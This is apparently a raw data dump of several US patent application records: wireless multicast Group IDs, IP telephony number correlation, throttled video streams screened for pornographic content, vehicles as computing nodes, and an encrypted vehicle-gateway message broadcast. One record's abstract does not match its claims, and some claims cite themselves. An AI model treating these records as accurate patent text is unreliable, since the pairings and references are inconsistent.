by the wireless AP: receiving a second request from a second wireless STA of the plurality of wireless STAs to receive the data stream; and sending to the second wireless STA a second management message that assigns the second wireless STA to the Group ID, wherein both the wireless STA and the second wireless STA receive the data stream via the same data messages. 3. The method of claim 1, wherein the management message comprises a management action frame formatted in accordance with an 802.11 wireless communication protocol. 4. The method of claim 1, wherein the data messages comprise very high transmission (VHT) physical layer convergence protocol (PLCP) protocol data units (PDUs) that include multiple media access control (MAC) layer PDUs. 5. The method of claim 1, wherein the one or more Group IDs for multicast transmission comprise a set of Group ID values assigned only for multicast transmission by the wireless AP. 6. The method of claim 1, wherein the management message that assigns the wireless STA to the Group ID further assigns the wireless STA to a group position within a group of data streams that share the Group ID, where the group position indicates data associated with the data stream requested by the wireless STA. 7. The method of claim 1, wherein each data stream of the plurality of data streams is associated with a different radio frequency channel of a radio frequency band, wherein the radio frequency band is associated with the Group ID. 8. The method of claim 7, wherein each radio frequency channel of the radio frequency band is associated with a distinct group position for the Group ID. 9. The method of claim 1, wherein at least one data stream of the plurality of data streams is associated with a plurality of radio frequency channels of a radio frequency band, wherein the radio frequency band is associated with the Group ID and the plurality of radio frequency channels are communicated in parallel using carrier aggregation. 10. A wireless access point (AP) configurable for multicast transmission to a plurality of wireless stations (STAs), the wireless AP comprising:
wireless circuitry communicatively coupled to a plurality of antennas; one or more processors communicatively coupled to the wireless circuitry; and a memory communicatively coupled to the one or more processors and storing instructions that, when executed by the one or more processors, cause the wireless AP to send multicast transmissions to a plurality of wireless stations (STAs) by at least:
providing to the plurality of wireless STAs an association of a plurality of data streams with one or more Group Identifiers (IDs) for multicast transmission;
receiving a request from a wireless STA of the plurality of wireless STAs to receive a data stream of the plurality of data streams;
sending to the wireless STA a management message that assigns the wireless STA to a Group ID of the one of more Group IDs, the Group ID corresponding to the data stream; and
transmitting to the plurality of wireless STAs the data stream using data messages that include multiple data streams aggregated together based on the one or more Group IDs. 11. The wireless AP of claim 10, wherein execution of the instructions further causes the wireless AP to send multicast transmissions to a plurality of wireless stations (STAs) by at least:
receiving a second request from a second wireless STA of the plurality of wireless STAs to receive the data stream; and sending to the second wireless STA a second management message that assigns the second wireless STA to the Group ID, wherein both the wireless STA and the second wireless STA receive the data stream via the same data messages. 12. The wireless AP of claim 10, wherein the management message comprises a management action frame formatted in accordance with an 802.11 wireless communication protocol. 13. The wireless AP of claim 10, wherein the data messages comprise very high transmission (VHT) physical layer convergence protocol (PLCP) protocol data units (PDUs) that include multiple media access control (MAC) layer PDUs. 14. The wireless AP of claim 10, wherein the one or more Group IDs for multicast transmission comprise a set of Group ID values assigned only for multicast transmission use by the wireless AP. 15. The wireless AP of claim 10, wherein the management message that assigns the wireless STA to the Group ID further assigns the wireless STA to a group position within a group of data streams that share the Group ID, where the group position indicates data associated with the data stream requested by the wireless STA. 16. The wireless AP of claim 10, wherein each data stream of the plurality of data streams is associated with a different radio frequency channel of a radio frequency band, wherein the radio frequency band is associated with the Group ID. 17. The wireless AP of claim 16, wherein each radio frequency channel of the radio frequency band is associated with a distinct group position for the Group ID. 18. The wireless AP of claim 10, wherein at least one data stream of the plurality of data streams is associated with a plurality of radio frequency channels of a radio frequency band, wherein the radio frequency band is associated with the Group ID and the plurality of radio frequency channels are communicated in parallel using carrier aggregation. 19. A wireless station (STA) configurable for receiving multicast transmission from a wireless access point (AP), the wireless STA comprising:
wireless circuitry communicatively coupled to one or more antennas; one or more processors communicatively coupled to the wireless circuitry; and a memory communicatively coupled to the one or more processors and storing instructions that, when executed by the one or more processors, cause the wireless STA to receive multicast transmissions from the wireless AP by at least:
receiving from the wireless AP an association of a plurality of data streams with one or more Group Identifiers (IDs) for multicast transmissions;
sending a request to the wireless AP to receive a data stream of the plurality of data streams;
receiving from the wireless AP a management message that assigns the wireless STA to a Group ID of the one of more Group IDs, the Group ID corresponding to the data stream; and
receiving from the wireless AP the data stream using data messages that include multiple data streams aggregated together based on the one or more Group IDs. 20. The wireless STA of claim 19, wherein the management message that assigns the wireless STA to the Group ID further assigns the wireless STA to a group position within a group of data streams that share the Group ID, where the group position indicates data associated with the data stream requested by the wireless STA. | Methods and apparatus for transmission of data streams using a multicast packet format based on group identifiers (Group IDs) to deliver data to multiple recipient stations (STAs). Using Group IDs, an access point (AP) assigns multiple STAs to one or more groups, and uniquely assigns each STA to a particular position within the group, such that it can receive a requested data stream. A Group ID management action frame provided by the AP to an individual STA indicates to which group (or groups) the STA is assigned and the STA's position within the group, with which information the STA can determine whether a packet is intended for the STA and which portion of the packet to decode in order to receive requested data streams.1. A method for multicast transmission from a wireless access point (AP) to a plurality of wireless stations (STAs), the method comprising:
by the wireless AP: providing to the plurality of wireless STAs an association of a plurality of data streams with one or more Group Identifiers (IDs) for multicast transmission; receiving a request from a wireless STA of the plurality of wireless STAs to receive a data stream of the plurality of data streams; sending to the wireless STA a management message that assigns the wireless STA to a Group ID of the one of more Group IDs, the Group ID corresponding to the data stream; and transmitting to the plurality of wireless STAs the data stream using data messages that include multiple data streams aggregated together based on the one or more Group IDs. 2. The method of claim 1, further comprising:
by the wireless AP: receiving a second request from a second wireless STA of the plurality of wireless STAs to receive the data stream; and sending to the second wireless STA a second management message that assigns the second wireless STA to the Group ID, wherein both the wireless STA and the second wireless STA receive the data stream via the same data messages. 3. The method of claim 1, wherein the management message comprises a management action frame formatted in accordance with an 802.11 wireless communication protocol. 4. The method of claim 1, wherein the data messages comprise very high transmission (VHT) physical layer convergence protocol (PLCP) protocol data units (PDUs) that include multiple media access control (MAC) layer PDUs. 5. The method of claim 1, wherein the one or more Group IDs for multicast transmission comprise a set of Group ID values assigned only for multicast transmission by the wireless AP. 6. The method of claim 1, wherein the management message that assigns the wireless STA to the Group ID further assigns the wireless STA to a group position within a group of data streams that share the Group ID, where the group position indicates data associated with the data stream requested by the wireless STA. 7. The method of claim 1, wherein each data stream of the plurality of data streams is associated with a different radio frequency channel of a radio frequency band, wherein the radio frequency band is associated with the Group ID. 8. The method of claim 7, wherein each radio frequency channel of the radio frequency band is associated with a distinct group position for the Group ID. 9. The method of claim 1, wherein at least one data stream of the plurality of data streams is associated with a plurality of radio frequency channels of a radio frequency band, wherein the radio frequency band is associated with the Group ID and the plurality of radio frequency channels are communicated in parallel using carrier aggregation. 10. A wireless access point (AP) configurable for multicast transmission to a plurality of wireless stations (STAs), the wireless AP comprising:
wireless circuitry communicatively coupled to a plurality of antennas; one or more processors communicatively coupled to the wireless circuitry; and a memory communicatively coupled to the one or more processors and storing instructions that, when executed by the one or more processors, cause the wireless AP to send multicast transmissions to a plurality of wireless stations (STAs) by at least:
providing to the plurality of wireless STAs an association of a plurality of data streams with one or more Group Identifiers (IDs) for multicast transmission;
receiving a request from a wireless STA of the plurality of wireless STAs to receive a data stream of the plurality of data streams;
sending to the wireless STA a management message that assigns the wireless STA to a Group ID of the one of more Group IDs, the Group ID corresponding to the data stream; and
transmitting to the plurality of wireless STAs the data stream using data messages that include multiple data streams aggregated together based on the one or more Group IDs. 11. The wireless AP of claim 10, wherein execution of the instructions further causes the wireless AP to send multicast transmissions to a plurality of wireless stations (STAs) by at least:
receiving a second request from a second wireless STA of the plurality of wireless STAs to receive the data stream; and sending to the second wireless STA a second management message that assigns the second wireless STA to the Group ID, wherein both the wireless STA and the second wireless STA receive the data stream via the same data messages. 12. The wireless AP of claim 10, wherein the management message comprises a management action frame formatted in accordance with an 802.11 wireless communication protocol. 13. The wireless AP of claim 10, wherein the data messages comprise very high transmission (VHT) physical layer convergence protocol (PLCP) protocol data units (PDUs) that include multiple media access control (MAC) layer PDUs. 14. The wireless AP of claim 10, wherein the one or more Group IDs for multicast transmission comprise a set of Group ID values assigned only for multicast transmission use by the wireless AP. 15. The wireless AP of claim 10, wherein the management message that assigns the wireless STA to the Group ID further assigns the wireless STA to a group position within a group of data streams that share the Group ID, where the group position indicates data associated with the data stream requested by the wireless STA. 16. The wireless AP of claim 10, wherein each data stream of the plurality of data streams is associated with a different radio frequency channel of a radio frequency band, wherein the radio frequency band is associated with the Group ID. 17. The wireless AP of claim 16, wherein each radio frequency channel of the radio frequency band is associated with a distinct group position for the Group ID. 18. The wireless AP of claim 10, wherein at least one data stream of the plurality of data streams is associated with a plurality of radio frequency channels of a radio frequency band, wherein the radio frequency band is associated with the Group ID and the plurality of radio frequency channels are communicated in parallel using carrier aggregation. 19. A wireless station (STA) configurable for receiving multicast transmission from a wireless access point (AP), the wireless STA comprising:
wireless circuitry communicatively coupled to one or more antennas; one or more processors communicatively coupled to the wireless circuitry; and a memory communicatively coupled to the one or more processors and storing instructions that, when executed by the one or more processors, cause the wireless STA to receive multicast transmissions from the wireless AP by at least:
receiving from the wireless AP an association of a plurality of data streams with one or more Group Identifiers (IDs) for multicast transmissions;
sending a request to the wireless AP to receive a data stream of the plurality of data streams;
receiving from the wireless AP a management message that assigns the wireless STA to a Group ID of the one of more Group IDs, the Group ID corresponding to the data stream; and
receiving from the wireless AP the data stream using data messages that include multiple data streams aggregated together based on the one or more Group IDs. 20. The wireless STA of claim 19, wherein the management message that assigns the wireless STA to the Group ID further assigns the wireless STA to a group position within a group of data streams that share the Group ID, where the group position indicates data associated with the data stream requested by the wireless STA. | 2,400 |
9,176 | 9,176 | 13,244,872 | 2,468 | An IP telephony system allows users of the IP telephony system to register extension telephony devices with the IP telephony system. An extension telephony device is one that is provided with service by a separate telephony service provider. Once an extension telephony device is registered, a user can obtain communications services from the IP telephony system using the extension telephony device. A extension telephony device may be tied to a user's main telephony services account with the IP telephony system such that when the user obtains communications services from the IP telephony system using an extension telephony device, the user will be billed for those communications services through the user's main account. | 1. A method of creating a correlation between telephone numbers associated with different geographical areas, comprising:
receiving, from a telephony device, a request for the assignment of a telephone number associated with a first geographical area that is to correspond to a telephone number associated with a second geographical area; assigning a first telephone number associated with the first geographical area to a second telephone number associated with the second geographical area where the first telephone number can subsequently be used to connect telephony communications to the second telephone number; and informing the telephony device of the first telephone number. 2. The method of claim 1, wherein the receiving step comprises receiving the request from a software application running on the telephony device. 3. The method of claim 2, wherein the informing step comprises informing the software application running on the telephony device of the first telephone number. 4. The method of claim 1, wherein the receiving step also comprises receiving an identity of a party that is reachable at the second telephone number. 5. The method of claim 4, wherein the informing step comprises initiating a telephone call to the telephony device, where caller ID information for the telephone call includes the assigned first telephone number and the identity of the party reachable at the second telephone number. 6. A system for creating a correlation between telephone numbers associated with different geographical areas, comprising:
means for receiving, from a telephony device, a request for the assignment of a telephone number associated with a first geographical area that is to correspond to a telephone number associated with a second geographical area; means for assigning a first telephone number associated with the first geographical area to a second telephone number associated with the second geographical area, where the first telephone number can subsequently be used to connect telephony communications to the second telephone number; and means for informing the telephony device of the first telephone number. 7. A system for creating a correlation between telephone numbers associated with different geographical areas, comprising:
a receiving unit that receives from a telephony device a request for the assignment of a telephone number associated with a first geographical area that is to correspond to a telephone number associated with a second geographical area; an assignment unit that assigns a first telephone number associated with the first geographical area to a second telephone number associated with the second geographical area, where the first telephone number can subsequently be used to connect telephony communications to the second telephone number; and an informing unit that informs the telephony device of the first telephone number. 8. The system of claim 7, wherein the receiving unit receives the request from a software application running on the telephony device: 9. The system of claim 8, wherein the informing unit informs the software application running on the telephony device of the first telephone number. 10. The system of claim 7, wherein the receiving unit also receives an identity of a party that is reachable at the second telephone number. 11. The system of claim 10, wherein the informing unit initiates a telephone call to the telephony device, and wherein caller ID information for the telephone call includes the assigned first telephone number and the identity of the party reachable at the second telephone number. 12. A method of correlating telephone numbers associated with different geographical areas, comprising:
sending, from a telephony device, a request for a telephone number associated with a first geographical area to be correlated to a telephone number associated with a second geographical area, wherein the request includes the telephone number associated with the second geographical area and an identity of a party that is reachable at that number; receiving an incoming telephone call at the telephony device, wherein the incoming telephone call includes caller ID information that indicates the telephone number associated with the first geographical area and the identity of the party that is reachable at the telephone number associated with the second geographical area. 13. The method of claim 12, further comprising causing the telephone number included in the caller ID of the received incoming telephone call to be stored in a contact list on the telephony device against the identity of the party reachable at the telephone number associated with the second geographical area. | An IP telephony system allows users of the IP telephony system to register extension telephony devices with the IP telephony system. An extension telephony device is one that is provided with service by a separate telephony service provider. Once an extension telephony device is registered, a user can obtain communications services from the IP telephony system using the extension telephony device. A extension telephony device may be tied to a user's main telephony services account with the IP telephony system such that when the user obtains communications services from the IP telephony system using an extension telephony device, the user will be billed for those communications services through the user's main account.1. A method of creating a correlation between telephone numbers associated with different geographical areas, comprising:
receiving, from a telephony device, a request for the assignment of a telephone number associated with a first geographical area that is to correspond to a telephone number associated with a second geographical area; assigning a first telephone number associated with the first geographical area to a second telephone number associated with the second geographical area where the first telephone number can subsequently be used to connect telephony communications to the second telephone number; and informing the telephony device of the first telephone number. 2. The method of claim 1, wherein the receiving step comprises receiving the request from a software application running on the telephony device. 3. The method of claim 2, wherein the informing step comprises informing the software application running on the telephony device of the first telephone number. 4. The method of claim 1, wherein the receiving step also comprises receiving an identity of a party that is reachable at the second telephone number. 5. The method of claim 4, wherein the informing step comprises initiating a telephone call to the telephony device, where caller ID information for the telephone call includes the assigned first telephone number and the identity of the party reachable at the second telephone number. 6. A system for creating a correlation between telephone numbers associated with different geographical areas, comprising:
means for receiving, from a telephony device, a request for the assignment of a telephone number associated with a first geographical area that is to correspond to a telephone number associated with a second geographical area; means for assigning a first telephone number associated with the first geographical area to a second telephone number associated with the second geographical area, where the first telephone number can subsequently be used to connect telephony communications to the second telephone number; and means for informing the telephony device of the first telephone number. 7. A system for creating a correlation between telephone numbers associated with different geographical areas, comprising:
a receiving unit that receives from a telephony device a request for the assignment of a telephone number associated with a first geographical area that is to correspond to a telephone number associated with a second geographical area; an assignment unit that assigns a first telephone number associated with the first geographical area to a second telephone number associated with the second geographical area, where the first telephone number can subsequently be used to connect telephony communications to the second telephone number; and an informing unit that informs the telephony device of the first telephone number. 8. The system of claim 7, wherein the receiving unit receives the request from a software application running on the telephony device: 9. The system of claim 8, wherein the informing unit informs the software application running on the telephony device of the first telephone number. 10. The system of claim 7, wherein the receiving unit also receives an identity of a party that is reachable at the second telephone number. 11. The system of claim 10, wherein the informing unit initiates a telephone call to the telephony device, and wherein caller ID information for the telephone call includes the assigned first telephone number and the identity of the party reachable at the second telephone number. 12. A method of correlating telephone numbers associated with different geographical areas, comprising:
sending, from a telephony device, a request for a telephone number associated with a first geographical area to be correlated to a telephone number associated with a second geographical area, wherein the request includes the telephone number associated with the second geographical area and an identity of a party that is reachable at that number; receiving an incoming telephone call at the telephony device, wherein the incoming telephone call includes caller ID information that indicates the telephone number associated with the first geographical area and the identity of the party that is reachable at the telephone number associated with the second geographical area. 13. The method of claim 12, further comprising causing the telephone number included in the caller ID of the received incoming telephone call to be stored in a contact list on the telephony device against the identity of the party reachable at the telephone number associated with the second geographical area. | 2,400 |
9,177 | 9,177 | 14,758,057 | 2,426 | The present invention relates to a method of transmitting a video stream, including: intercepting a video stream from a server to a video client; wherein the video client is on a user device; throttling onwards transmission of the video stream to the video client; analysing content within the video of the video stream; and performing an action in relation to the onward transmission to the video client as a result of the analysis of the content; wherein the throttling continues during analysis of the content. A system and software for transmitting a video stream are also described. | 1-28. (canceled) 29. A method of transmitting a video stream, including:
a) intercepting a video stream from a server to a video client; wherein the video client is on a user device; b) throttling onwards transmission of the video stream to the video client; c) analysing content within the video of the video stream; and d) performing an action in relation to the onward transmission to the video client as a result of the analysis of the content;
wherein the throttling continues during the analysis of the content. 30. A method as claimed in claim 29 wherein the step of interception occurs at a proxy device between the transmission from the server to the user device. 31. A method as claimed in claim 29 wherein the step of interception occurs at the user device. 32. A method as claimed in claim 29 wherein the throttling is caused by introducing a pause into onward transmission. 33. A method as claimed in claim 32 wherein a pause is introduced before transmission of every block of the video stream. 34. A method as claimed in claim 33 wherein the size of the block is determined by, at least, the video size and the video length. 35. A method as claimed in claim 34 wherein the size of the block (t) is calculated by the following formula:
t
=
s
*
p
(
l
-
d
)
where
t=Block Size (Bytes)
s=Video Size (Kilobytes)
l=Video Length (Seconds)
d=Delay (Seconds)
p=Pause (Milliseconds) 36. A method as claimed in claim 35 wherein the length of the delay (d) is determined by the video length. 37. A method as claimed in claim 29 wherein the action includes one of increasing the throttling of onward transmission of the video stream, decreasing the throttling of onward transmission of the video stream, or blocking onward transmission of the video stream. 38. A method as claimed in claim 29 wherein during initial interception of the video stream an initial block of a specified size of the video stream is transmitted onto the video client. 39. A method as claimed in claim 38, wherein the specified size of the initial block is at least the size of the header of the video. 40. A method as claimed in claim 29 wherein the step of analysing content includes analysing the content for pornographic content. 41. A method as claimed in claim 40 wherein the action includes blocking of the onward transmission of the video stream if the pornographic content as a result of the analysis is determined to exceed a specified threshold. 42. A method as claimed in claim 29 wherein the analysis utilises a static image analysis of at least some frames within the video. 43. A method as claimed in claim 29 furthering including the step of requesting a second transmission of the video from the server; wherein the analysis is performed on the content of the video within the second transmission. 44. A system for transmission of a video stream, including:
a first processor configured to throttle onwards transmission of a video stream to a video client on a user device and to perform an action in relation to the onward transmission to the video client as a result of analysis of content within the video of the video stream; a second processor configured to analyse the content within the video of the video stream; and a communications apparatus configured to intercept the video stream from the server to the video client on the user device; wherein the first processor is configured to continue throttling of the onward transmission of the video stream during analysis of the content of the video of the video stream by the second processor. 45. A system as claimed in claim 44, further including a further communications apparatus configured for receiving a second transmission of the video from the server; wherein the second processor analyses the content within the video of the second transmission. 46. A system as claimed in claim 44, wherein the first processor exists within the user device. 47. A system as claimed in claim 44, wherein the second processor exists within the user device. 48. A system as claimed in claim 44, wherein the first processor is configured to request analysis of the video from the second processor and wherein the second processor analyses the video in response to the request. 49. A system as claimed in claim 48, wherein the requests are stored within a database and wherein the second processor is configured to extract the requests from the database. 50. A processor configured for use with the system of claim 44, wherein the processor is configured to throttle onwards transmission of a video stream to a video client on a user device and to perform an action in relation to the onward transmission to the video client as a result of analysis of content of the video of the video stream. 51. A processor configured for use with the system of claim 44, wherein the processor is configured to analyse the content within the video of the video stream. 52. A user device configured for use with the system of any one of claims 44. 53. An application program interface configured for providing access to the system of any one of claims 44. 54. A user device configured for use with the system of claim 49. 55. An application program interface configured for providing access to the system of claim 49. 56. A computer program configured for performing the method of claim 29. | The present invention relates to a method of transmitting a video stream, including: intercepting a video stream from a server to a video client; wherein the video client is on a user device; throttling onwards transmission of the video stream to the video client; analysing content within the video of the video stream; and performing an action in relation to the onward transmission to the video client as a result of the analysis of the content; wherein the throttling continues during analysis of the content. A system and software for transmitting a video stream are also described.1-28. (canceled) 29. A method of transmitting a video stream, including:
a) intercepting a video stream from a server to a video client; wherein the video client is on a user device; b) throttling onwards transmission of the video stream to the video client; c) analysing content within the video of the video stream; and d) performing an action in relation to the onward transmission to the video client as a result of the analysis of the content;
wherein the throttling continues during the analysis of the content. 30. A method as claimed in claim 29 wherein the step of interception occurs at a proxy device between the transmission from the server to the user device. 31. A method as claimed in claim 29 wherein the step of interception occurs at the user device. 32. A method as claimed in claim 29 wherein the throttling is caused by introducing a pause into onward transmission. 33. A method as claimed in claim 32 wherein a pause is introduced before transmission of every block of the video stream. 34. A method as claimed in claim 33 wherein the size of the block is determined by, at least, the video size and the video length. 35. A method as claimed in claim 34 wherein the size of the block (t) is calculated by the following formula:
t
=
s
*
p
(
l
-
d
)
where
t=Block Size (Bytes)
s=Video Size (Kilobytes)
l=Video Length (Seconds)
d=Delay (Seconds)
p=Pause (Milliseconds) 36. A method as claimed in claim 35 wherein the length of the delay (d) is determined by the video length. 37. A method as claimed in claim 29 wherein the action includes one of increasing the throttling of onward transmission of the video stream, decreasing the throttling of onward transmission of the video stream, or blocking onward transmission of the video stream. 38. A method as claimed in claim 29 wherein during initial interception of the video stream an initial block of a specified size of the video stream is transmitted onto the video client. 39. A method as claimed in claim 38, wherein the specified size of the initial block is at least the size of the header of the video. 40. A method as claimed in claim 29 wherein the step of analysing content includes analysing the content for pornographic content. 41. A method as claimed in claim 40 wherein the action includes blocking of the onward transmission of the video stream if the pornographic content as a result of the analysis is determined to exceed a specified threshold. 42. A method as claimed in claim 29 wherein the analysis utilises a static image analysis of at least some frames within the video. 43. A method as claimed in claim 29 furthering including the step of requesting a second transmission of the video from the server; wherein the analysis is performed on the content of the video within the second transmission. 44. A system for transmission of a video stream, including:
a first processor configured to throttle onwards transmission of a video stream to a video client on a user device and to perform an action in relation to the onward transmission to the video client as a result of analysis of content within the video of the video stream; a second processor configured to analyse the content within the video of the video stream; and a communications apparatus configured to intercept the video stream from the server to the video client on the user device; wherein the first processor is configured to continue throttling of the onward transmission of the video stream during analysis of the content of the video of the video stream by the second processor. 45. A system as claimed in claim 44, further including a further communications apparatus configured for receiving a second transmission of the video from the server; wherein the second processor analyses the content within the video of the second transmission. 46. A system as claimed in claim 44, wherein the first processor exists within the user device. 47. A system as claimed in claim 44, wherein the second processor exists within the user device. 48. A system as claimed in claim 44, wherein the first processor is configured to request analysis of the video from the second processor and wherein the second processor analyses the video in response to the request. 49. A system as claimed in claim 48, wherein the requests are stored within a database and wherein the second processor is configured to extract the requests from the database. 50. A processor configured for use with the system of claim 44, wherein the processor is configured to throttle onwards transmission of a video stream to a video client on a user device and to perform an action in relation to the onward transmission to the video client as a result of analysis of content of the video of the video stream. 51. A processor configured for use with the system of claim 44, wherein the processor is configured to analyse the content within the video of the video stream. 52. A user device configured for use with the system of any one of claims 44. 53. An application program interface configured for providing access to the system of any one of claims 44. 54. A user device configured for use with the system of claim 49. 55. An application program interface configured for providing access to the system of claim 49. 56. A computer program configured for performing the method of claim 29. | 2,400 |
9,178 | 9,178 | 16,165,789 | 2,454 | A distributed computing network includes one or more vehicles, each vehicle configured to act as a node in the distributed computing network, and a remote server including a processor and a memory module storing one or more non-transient processor-readable instructions that when executed by the processor cause the remote server to establish a data connection with the one or more vehicles, predict a pattern-of-use of the one or more vehicles, determine a predicted current use of the one or more vehicles, and allocate a computational task to the one or more vehicles based on the predicted pattern-of-use and the predicted current use. | 1. A distributed computing network comprising:
one or more vehicles, each vehicle configured to act as a node in the distributed computing network; and a remote server comprising a processor and a memory module storing one or more non-transient processor-readable instructions that when executed by the processor cause the remote server to:
establish a data connection with the one or more vehicles;
predict a pattern-of-use of the one or more vehicles;
determine a predicted current use of the one or more vehicles; and
allocate a computational task to the one or more vehicles based on the predicted pattern-of-use and the predicted current use. 2. The distributed computing network of claim 1, wherein the predicted current use of the one or more vehicles is determined based on a current location of the one or more vehicles. 3. The distributed computing network of claim 1, wherein the predicted current use of the one or more vehicles is determined based on a status of one or more critical systems of the one or more vehicles. 4. The distributed computing network of claim 3, wherein the one or more critical systems include an adaptive cruise control system. 5. The distributed computing network of claim 3, wherein:
the one or more critical systems include a battery module that monitors a battery voltage and use rate of a vehicle battery; and the remote server allocates computational tasks to the one or more vehicles based on the battery voltage and use rate. 6. The distributed computing network of claim 1, wherein the computational task includes mining cryptocurrency. 7. The distributed computing network of claim 1, wherein at least one of the one or more vehicles is a ride-share vehicle and the pattern-of-use is predicted based on reservation information of the ride-share vehicle. 8. The distributed computing network of claim 1, wherein allocation of the computational task is further based on the processing capacity of the one or more vehicles. 9. The distributed computing network of claim 1, wherein users of the one or more vehicles receive an incentive to perform computational tasks allocated by the remote server. 10. A vehicle configured to act as a node in a distributed computing network, the vehicle comprising:
network interface hardware; a processor; and a memory module storing non-transient processor-readable instructions that when executed by the processor cause the vehicle to:
establish a communicative connection with a remote server;
predict a pattern-of-use;
predict a current use;
transmit the predicted pattern-of-use and the predicted current use to the remote server; and
receive a computational task from the remote server based on the predicted pattern-of-use and the predicted current use. 11. The vehicle of claim 10, wherein the non-transient processor-readable instructions further cause the vehicle to:
identify a current location of the vehicle; and transmit the current location of the vehicle to the remote server. 12. The vehicle of claim 10, wherein the current use is predicted based on the status of one or more critical systems of the vehicle. 13. The vehicle of claim 12, wherein the one or more critical systems include an adaptive cruise control system of the vehicle. 14. The vehicle of claim 12, wherein:
the one or more critical systems include a battery system that monitors a battery voltage and use rate of a vehicle battery; and the vehicle receives computational tasks based on the battery voltage and use rate. 15. The vehicle of claim 10, wherein the computational task includes mining cryptocurrency. 16. The vehicle of claim 10, wherein the vehicle is a ride-share vehicle and the pattern-of-use is predicted based on reservation information. 17. The vehicle of claim 10, wherein the vehicle accepts one or more incentives in exchange for performing computational tasks. 18. A method of allocating computational tasks in a distributed computing network comprising a remote server communicatively coupled between a grid computing network and one or more vehicles acting as nodes in the network, the method comprising:
establishing, by the remote server, a data connection with the one or more vehicles; predicting, by the remote server, a pattern-of-use of the one or more vehicles; predicting, by the remote server, a current use of the one or more vehicles; and allocating, by the remote server, a computational task to the one or more vehicles based on the predicted pattern-of-use and the predicted current use. 19. The method of claim 19, wherein users of the one or more vehicles receive an incentive to perform the allocated computational task. 20. The method of claim 20, wherein the computational task includes mining cryptocurrency. | A distributed computing network includes one or more vehicles, each vehicle configured to act as a node in the distributed computing network, and a remote server including a processor and a memory module storing one or more non-transient processor-readable instructions that when executed by the processor cause the remote server to establish a data connection with the one or more vehicles, predict a pattern-of-use of the one or more vehicles, determine a predicted current use of the one or more vehicles, and allocate a computational task to the one or more vehicles based on the predicted pattern-of-use and the predicted current use.1. A distributed computing network comprising:
one or more vehicles, each vehicle configured to act as a node in the distributed computing network; and a remote server comprising a processor and a memory module storing one or more non-transient processor-readable instructions that when executed by the processor cause the remote server to:
establish a data connection with the one or more vehicles;
predict a pattern-of-use of the one or more vehicles;
determine a predicted current use of the one or more vehicles; and
allocate a computational task to the one or more vehicles based on the predicted pattern-of-use and the predicted current use. 2. The distributed computing network of claim 1, wherein the predicted current use of the one or more vehicles is determined based on a current location of the one or more vehicles. 3. The distributed computing network of claim 1, wherein the predicted current use of the one or more vehicles is determined based on a status of one or more critical systems of the one or more vehicles. 4. The distributed computing network of claim 3, wherein the one or more critical systems include an adaptive cruise control system. 5. The distributed computing network of claim 3, wherein:
the one or more critical systems include a battery module that monitors a battery voltage and use rate of a vehicle battery; and the remote server allocates computational tasks to the one or more vehicles based on the battery voltage and use rate. 6. The distributed computing network of claim 1, wherein the computational task includes mining cryptocurrency. 7. The distributed computing network of claim 1, wherein at least one of the one or more vehicles is a ride-share vehicle and the pattern-of-use is predicted based on reservation information of the ride-share vehicle. 8. The distributed computing network of claim 1, wherein allocation of the computational task is further based on the processing capacity of the one or more vehicles. 9. The distributed computing network of claim 1, wherein users of the one or more vehicles receive an incentive to perform computational tasks allocated by the remote server. 10. A vehicle configured to act as a node in a distributed computing network, the vehicle comprising:
network interface hardware; a processor; and a memory module storing non-transient processor-readable instructions that when executed by the processor cause the vehicle to:
establish a communicative connection with a remote server;
predict a pattern-of-use;
predict a current use;
transmit the predicted pattern-of-use and the predicted current use to the remote server; and
receive a computational task from the remote server based on the predicted pattern-of-use and the predicted current use. 11. The vehicle of claim 10, wherein the non-transient processor-readable instructions further cause the vehicle to:
identify a current location of the vehicle; and transmit the current location of the vehicle to the remote server. 12. The vehicle of claim 10, wherein the current use is predicted based on the status of one or more critical systems of the vehicle. 13. The vehicle of claim 12, wherein the one or more critical systems include an adaptive cruise control system of the vehicle. 14. The vehicle of claim 12, wherein:
the one or more critical systems include a battery system that monitors a battery voltage and use rate of a vehicle battery; and the vehicle receives computational tasks based on the battery voltage and use rate. 15. The vehicle of claim 10, wherein the computational task includes mining cryptocurrency. 16. The vehicle of claim 10, wherein the vehicle is a ride-share vehicle and the pattern-of-use is predicted based on reservation information. 17. The vehicle of claim 10, wherein the vehicle accepts one or more incentives in exchange for performing computational tasks. 18. A method of allocating computational tasks in a distributed computing network comprising a remote server communicatively coupled between a grid computing network and one or more vehicles acting as nodes in the network, the method comprising:
establishing, by the remote server, a data connection with the one or more vehicles; predicting, by the remote server, a pattern-of-use of the one or more vehicles; predicting, by the remote server, a current use of the one or more vehicles; and allocating, by the remote server, a computational task to the one or more vehicles based on the predicted pattern-of-use and the predicted current use. 19. The method of claim 19, wherein users of the one or more vehicles receive an incentive to perform the allocated computational task. 20. The method of claim 20, wherein the computational task includes mining cryptocurrency. | 2,400 |
9,179 | 9,179 | 14,940,985 | 2,492 | A system includes a processor configured to wirelessly broadcast a message obtained from a first originating vehicle BUS or controller, following a determination that the message was on a pre-approved list for broadcast and having encrypted the message utilizing a temporary random key generated for a message session. The system may include vehicle controllers, a gateway module, and vehicle BUSSES connecting the system controllers to the gateway module. The gateway module may include a memory storing a list of pre-approved message types and corresponding source types, and a processor configured to receive a message from one of the vehicle controllers over one of the vehicle BUSSES to determine if a message type and source type of the received message matches an element of the list. | 1. A system comprising:
a processor configured to: wirelessly broadcast a message obtained from a first originating vehicle BUS or controller, following a determination that the message was on a pre-approved list for broadcast and having encrypted the message utilizing a temporary random key generated for a message session. 2. The system of claim 1, wherein the message session comprises a single ignition cycle. 3. The system of claim 1, wherein the pre-approved list includes a designation of a message type and a source type which the processor determines match characteristics of the message prior to broadcast. 4. The system of claim 3, wherein the source type includes a first specific vehicle BUS. 5. The system of claim 3, wherein the source type includes a first specific vehicle controller. 6. The system of claim 3, wherein the pre-approved list includes a designation of destination in conjunction with the message type and source type, and wherein the broadcast includes delivery of the message to the designated destination. 7. The system of claim 6, wherein the destination is a second specific vehicle BUS or controller different from the first originating vehicle BUS or controller. 8. The system of claim 1, wherein the message is broadcast via a BLUETOOTH low energy transceiver. 9. The system of claim 1, wherein the processor is configured to deliver the temporary random key to a wireless device via a wireless connection different from a wireless connection used to wirelessly broadcast the message. 10. The system of claim 9, wherein the processor is configured to receive a request to engage a read/write mode, from an application pre-approved to request read/write, executing on the wireless device. 11. A computer implemented method comprising:
